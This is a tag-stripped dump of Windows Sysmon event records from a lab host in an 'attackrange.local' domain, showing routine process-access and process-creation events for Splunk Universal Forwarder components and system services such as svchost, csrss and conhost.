07:58:24.337{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F620-60EB-9D79-00000000D001}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808646Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808645Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808644Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808643Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808642Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808641Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808640Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808639Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808638Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808637Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.337{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F620-60EB-9D79-00000000D001}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808636Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.321{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F620-60EB-9D79-00000000D001}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808635Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.322{0C1E0330-F620-60EB-9D79-00000000D001}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808634Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.103{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61C4778553E0D5A35B8600BAB187E6FC,SHA256=0FC213F21A224CF8A788C107BEC331CE8FD2E4BF963DCF4043AE0DA5AD8E97FA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808677Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F621-60EB-9F79-00000000D001}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808676Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808675Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808674Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808673Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808672Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808671Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808670Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808669Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808668Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808667Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F621-60EB-9F79-00000000D001}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808666Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F621-60EB-9F79-00000000D001}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808665Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.590{0C1E0330-F621-60EB-9F79-00000000D001}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808664Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 